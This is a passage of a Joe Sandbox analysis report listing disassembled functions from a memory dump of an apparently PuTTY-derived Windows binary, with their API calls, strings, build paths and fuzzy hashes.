API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 1228832834-0
Opcode ID: 50b0e6cbe1b72fc85303edf13b978c0a102b1b464f936ad66da8003ff88a890d
Instruction ID: c6d3ea78fe95b45103c468bd8738d3e4927e22c1d41e7214ea81690c0dd2301a
Opcode Fuzzy Hash: 50b0e6cbe1b72fc85303edf13b978c0a102b1b464f936ad66da8003ff88a890d
Instruction Fuzzy Hash: 06118C31244301AFE7201F60FC09B6A7BAAFB02B81F084025F695C62A6D7719A04DB32

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C870 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432EC), ref: 00C7C8ED
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C91C
GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C926

Part of subcall function 00C7C580: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5B7
Part of subcall function 00C7C580: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C5C5
Part of subcall function 00C7C580: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C604
Part of subcall function 00C7C580: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C621
Part of subcall function 00C7C580: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C64B
Part of subcall function 00C7C580: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00C7C66A
Part of subcall function 00C7C580: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C68B
Part of subcall function 00C7C580: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C69A
Part of subcall function 00C7C580: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00C7C9C7), ref: 00C7C6A5

GetLastError.KERNEL32 ref: 00C7C93D
GetLastError.KERNEL32 ref: 00C7C954

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

Strings

unable to construct SID for local same-user access only: %s, xrefs: 00C7C936
unable to construct SID for current user: %s, xrefs: 00C7C94D
unable to construct SID for world: %s, xrefs: 00C7C964

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen_strlen
String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
API String ID: 3303103131-2222155745
Opcode ID: 5b849e6e202c33ace196450b8f2aa8e015f602e5bf003c3716b49fd9aa133f52
Instruction ID: e018163b64713df13e1174a7d8b7b94bb16c4c6ad9ef4e1807f858ba10155c6d
Opcode Fuzzy Hash: 5b849e6e202c33ace196450b8f2aa8e015f602e5bf003c3716b49fd9aa133f52
Instruction Fuzzy Hash: E621CFB4A01302AFE750AFB4AC86B6636E8AB14705F04842DF649C6391EBB49584DF72

Uniqueness

Uniqueness Score: -1.00%

Function 00C60090 Relevance: 13.9, APIs: 9, Instructions: 379windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000180,00000000,00D314DC), ref: 00C600E5
SetWindowLongA.USER32(?,00000000,00000001), ref: 00C6010B
SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 00C60155
SendDlgItemMessageA.USER32(?,?,0000018B,00000000,00000000), ref: 00C60170
SendDlgItemMessageA.USER32(00000001,FFFFFFFF,00000182,?,00000000), ref: 00C603ED
SendDlgItemMessageA.USER32(?,?,00000199,00000000,00000000), ref: 00C604FD

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend$LongWindow
String ID:
API String ID: 1736968133-0
Opcode ID: 9557cef914f60dd5ee7fdf06adbb4281bb5e2ee17ef6ab2b4b47a4b1542f22a1
Instruction ID: ae2be0dce84a913da6e608d9088beee342d9ae862b4d7fb333d76a6a9ceddc99
Opcode Fuzzy Hash: 9557cef914f60dd5ee7fdf06adbb4281bb5e2ee17ef6ab2b4b47a4b1542f22a1
Instruction Fuzzy Hash: FED15035604300AFD7248F15DCC4B2BBBE6AF85720F254A29F9A5A73D1DB71EC418B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C68D50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000107), ref: 00C68D79
_strlen.LIBCMT ref: 00C68D80
FindFirstFileA.KERNEL32(?,?), ref: 00C68D9D
FindNextFileA.KERNEL32(00000000,?), ref: 00C68DBD
FindClose.KERNEL32(00000000), ref: 00C68DC4
GetCurrentProcessId.KERNEL32 ref: 00C68DCA

Strings

\*, xrefs: 00C68D88

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows_strlen
String ID: \*
API String ID: 4151488164-2355939697
Opcode ID: 9bda1d57b74a611508f58bb0ea3bbb849af37207681920ed41fda33225349e6b
Instruction ID: 61693b08da0c410f519528902b073341af38475c2c9a26938b7ba16d789485a5
Opcode Fuzzy Hash: 9bda1d57b74a611508f58bb0ea3bbb849af37207681920ed41fda33225349e6b
Instruction Fuzzy Hash: 4D112671505310ABD2207724BC4AF9F379C9F49348F050524FA8CD6281EB356A098BF7

Uniqueness

Uniqueness Score: -1.00%

Function 00C41130 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e965191a992a06265fb0188ca8236aeb6830473dc8fc25e88c37f474e8eb8453
Instruction ID: c71098ee0d255f4b08bb4c0fd748b2281fab11804b711f1caf84a6da4fca2d59
Opcode Fuzzy Hash: e965191a992a06265fb0188ca8236aeb6830473dc8fc25e88c37f474e8eb8453
Instruction Fuzzy Hash: 92B10079A083409FDB249F24EC8576E77E5FB85300F58852DF999C33A1DB349A84CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C5AA50 Relevance: 9.3, Strings: 6, Instructions: 1763COMMON

Download Yara Rule

Strings

ctx->ds_sp < lenof(ctx->dsstack), xrefs: 00C5B0BE, 00C5B1BC
i == ctx->textlen - 1, xrefs: 00C5B029
ctx->ds_sp > 0, xrefs: 00C5AE7C, 00C5AF04
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/bidi.c, xrefs: 00C5AE77, 00C5AEFF, 00C5B024, 00C5B0B9, 00C5B1B7, 00C5B2C0, 00C5C13D
false && "how did this get past the outer switch?", xrefs: 00C5C142
ctx->levels[j] == irslevel, xrefs: 00C5B2C5

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/bidi.c$ctx->ds_sp < lenof(ctx->dsstack)$ctx->ds_sp > 0$ctx->levels[j] == irslevel$false && "how did this get past the outer switch?"$i == ctx->textlen - 1
API String ID: 0-1439565061
Opcode ID: 87220f960fffb2ceab104d8ef776bc47f2700cc92925321fee9b9af0d401e062
Instruction ID: 3d4a761282bd2925aa5af16f7a66dd44776c5899ce5e841d8f1ac57b39f04b07
Opcode Fuzzy Hash: 87220f960fffb2ceab104d8ef776bc47f2700cc92925321fee9b9af0d401e062
Instruction Fuzzy Hash: 9FE2B1796087058FC724CF19C49062ABBE2FF98311F18892DEDA68B351D731BD89DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DC40 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00C7DD82
GetCPInfo.KERNEL32(?,?), ref: 00C7DE6F
GetACP.KERNEL32 ref: 00C7DEE6
GetOEMCP.KERNEL32 ref: 00C7DEF3

Strings

UTF-8, xrefs: 00C7DC79

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Info
String ID: UTF-8
API String ID: 1807457897-243350608
Opcode ID: f96715fbf109b40c98679cbea86adf4a7fc2e0c34de8b822db11f19a05f2da44
Instruction ID: f5dcc6490e0361f441d7939eb211c68b21a92811b02f46519fd8e5b342d8c11e
Opcode Fuzzy Hash: f96715fbf109b40c98679cbea86adf4a7fc2e0c34de8b822db11f19a05f2da44
Instruction Fuzzy Hash: E3717671A083415BD7225A35589027B7BF46FA6364F188539F8FF8B382E235DE4493A3

Uniqueness

Uniqueness Score: -1.00%

Function 00C70100 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C70186

Strings

p - buf == maxlen, xrefs: 00C7026A
Cipher, xrefs: 00C7027B
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c, xrefs: 00C70265
%s%s, xrefs: 00C7021A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: %s%s$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c$Cipher$p - buf == maxlen
API String ID: 4218353326-2769314498
Opcode ID: 5380d2ef726a66a414cc0f1403e984cd204ce44dc44bb5e1d1da185f084646d4
Instruction ID: 0a21fb0c7db709860965cafb151b3185e7b4cc5ee613a62c389b89dcfb5d30aa
Opcode Fuzzy Hash: 5380d2ef726a66a414cc0f1403e984cd204ce44dc44bb5e1d1da185f084646d4
Instruction Fuzzy Hash: 6A414772A08304EBCB106E25DC4172EBBD4DB94758F29853CF85DA7392E6B1DD009392

Uniqueness

Uniqueness Score: -1.00%

Function 00CF90E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00CF8AC4,?,00000000), ref: 00CF917E
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00CF8AC4,?,00000000), ref: 00CF91A7
GetACP.KERNEL32(?,?,00CF8AC4,?,00000000), ref: 00CF91BC

Strings

OCP, xrefs: 00CF9139
ACP, xrefs: 00CF9103

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a2fbd7986b35fb43e9aed8126b1c12f2c990834f770c46abba899ac7036e6e01
Instruction ID: 20526ec9059741c8794a4a67a5fd870e9598569c1948735d57b44f6295b16220
Opcode Fuzzy Hash: a2fbd7986b35fb43e9aed8126b1c12f2c990834f770c46abba899ac7036e6e01
Instruction Fuzzy Hash: 32218122B0020AA7DFB48B159908BBF73B7EB50B50B56C434EB19D7210E732DE40D762

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CEE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
_strlen.LIBCMT ref: 00C7CF76
GetLastError.KERNEL32(?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF90

Strings

(unable to format: FormatMessage returned %u), xrefs: 00C7CF97
Error %d: %s, xrefs: 00C7CFAD

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorFormatLastMessage_strlen
String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
API String ID: 2706427827-1777221902
Opcode ID: 3d4d32529e3ece45aa6c83856b934c02c97628847e7b6b118d2d155e84a08ddb
Instruction ID: 13e0d2e176f5b5e18157db00ac6a7103aab754a4c3fc9565e0cf55691b9caa5e
Opcode Fuzzy Hash: 3d4d32529e3ece45aa6c83856b934c02c97628847e7b6b118d2d155e84a08ddb
Instruction Fuzzy Hash: 53213EB1B443016BD731AB64AC07FAB3AD4AF59744F04443CF59CD6392EAB195409763

Uniqueness

Uniqueness Score: -1.00%

Function 00C89C60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57libraryfileloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetFileAttributesExA), ref: 00C89CA2
FindFirstFileA.KERNEL32(?), ref: 00C89CD8
CloseHandle.KERNEL32(00000000), ref: 00C89CE4

Strings

kernel32.dll, xrefs: 00C89C86
GetFileAttributesExA, xrefs: 00C89C9C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressCloseFileFindFirstHandleProc
String ID: GetFileAttributesExA$kernel32.dll
API String ID: 3854970465-595542130
Opcode ID: 37b32ade92001b8ae419a3bc89fd2a5d6934d3d94a321fca4c3f68711947e7af
Instruction ID: ede8bbb5926928bd7097b42fade1c04e6cfd8483755e31a6276448b344d71fbc
Opcode Fuzzy Hash: 37b32ade92001b8ae419a3bc89fd2a5d6934d3d94a321fca4c3f68711947e7af
Instruction Fuzzy Hash: 2511A074705301AFD718AF39EC4973A37E5FB4A318F18042DE45AC63A0DB359904EB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00C59D50 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

term->selstart.x < term->cols, xrefs: 00C59EB6
term->selend.x > term->curs.x, xrefs: 00C59EDB
col >= 0 && col < line->cols, xrefs: 00C5A088, 00C5A1F5
term->selstart.x >= term->curs.x, xrefs: 00C59E8F
term->selend.x <= term->cols, xrefs: 00C59F00
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c, xrefs: 00C59E8A, 00C59EB1, 00C59ED6, 00C59EFB, 00C5A083, 00C5A1F0

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/terminal/terminal.c$col >= 0 && col < line->cols$term->selend.x <= term->cols$term->selend.x > term->curs.x$term->selstart.x < term->cols$term->selstart.x >= term->curs.x
API String ID: 0-3947459755
Opcode ID: 291a46ba54f4337f51d308c9433862739e07d22b9d3786886a220e009734b7de
Instruction ID: f6ecb42404a19e598fbb64ae96b3b67cde2c7e0d1011cb13cd46dceac5428a25
Opcode Fuzzy Hash: 291a46ba54f4337f51d308c9433862739e07d22b9d3786886a220e009734b7de
Instruction Fuzzy Hash: ADF1C275A047069FC718DF29C481A5AF7E2FF84300F058A2DE85A97391E770F959CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00CF897B Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00CF3742: GetLastError.KERNEL32(?,?,00CE60D8,?,?,?,?,00CEE2B7,00CEE284,?,?,?,?,?,00CEE284,?), ref: 00CF3746
Part of subcall function 00CF3742: SetLastError.KERNEL32(00000000,00CEE284,?,?,?,?,?,00CEE284,?,00000000,?,00000003,00CE1B8B), ref: 00CF37E8

GetUserDefaultLCID.KERNEL32 ref: 00CF8A87
IsValidCodePage.KERNEL32(00000000), ref: 00CF8AD0
IsValidLocale.KERNEL32(?,00000001), ref: 00CF8ADF
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00CF8B27
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00CF8B46

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: dfc00ff5f4a69ba6a8683f0fae8598ce03d89e0df5feece679754333a386bde0
Instruction ID: 684ad7c4ba271eb42a15d932b1bd713dbabcfa48485305a587a199f0b3958009
Opcode Fuzzy Hash: dfc00ff5f4a69ba6a8683f0fae8598ce03d89e0df5feece679754333a386bde0
Instruction Fuzzy Hash: 07516F71A0021EAFDF50DFA5DC41ABE77B8EF04700F04446AE715EB191EF709A48AB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C49D30 Relevance: 7.5, APIs: 5, Instructions: 23clipboardwindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 00C49D32
GetClipboardData.USER32(0000000D), ref: 00C49D3E
GetClipboardData.USER32(00000001), ref: 00C49D51
SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00C49D68
CloseClipboard.USER32 ref: 00C49D6E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Clipboard$Data$CloseMessageOpenSend
String ID:
API String ID: 2111581930-0
Opcode ID: f713b81950db2c465b6c5a3d9f109b08a4f3fd1089b734d8eeff626d298d99b8
Instruction ID: 93629c4924cbb693b807b7bdef4fd2b528615c6719c551f61279782e0c61cdd0
Opcode Fuzzy Hash: f713b81950db2c465b6c5a3d9f109b08a4f3fd1089b734d8eeff626d298d99b8
Instruction Fuzzy Hash: 70E012B07443019BE7141B30AC0EB2B3AAAEB40B02F080429B243C81E0DAA099409E31

Uniqueness

Uniqueness Score: -1.00%

Function 00C45B50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000000,00000400,?,?,?,00C41760), ref: 00C45B6D
AppendMenuA.USER32(00000000,00001000,?), ref: 00C45BA1
AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 00C45BD6

Strings

(No sessions), xrefs: 00C45BC4

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Menu$Append$Delete
String ID: (No sessions)
API String ID: 2878686843-1102551510
Opcode ID: d6822b7c4c0055bf8b4397cb706e0f5ca9ab983e4b81384ad546e88bedc8b40a
Instruction ID: 3ab8097f1d17572516aaf3f07212a9ee5b45c7c35e8de02e467c7c5d4705b45b
Opcode Fuzzy Hash: d6822b7c4c0055bf8b4397cb706e0f5ca9ab983e4b81384ad546e88bedc8b40a
Instruction Fuzzy Hash: 5CF0AF79640314ABEB204F14EE41F853622F347766F180021FA05E73B1C2A6A8819B68

Uniqueness

Uniqueness Score: -1.00%

Function 00C78670 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C78687
_strlen.LIBCMT ref: 00C786B1
_strlen.LIBCMT ref: 00C786E5
_strlen.LIBCMT ref: 00C7870B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a7b10816a810ab38b33e19babbf8e5400d3dee2afdfc07684b56076f369a50c8
Instruction ID: f8aa86cb1cf7a6ee41a2fd3c8a6edac471130a2483be555bf947d4fedeea8ac6
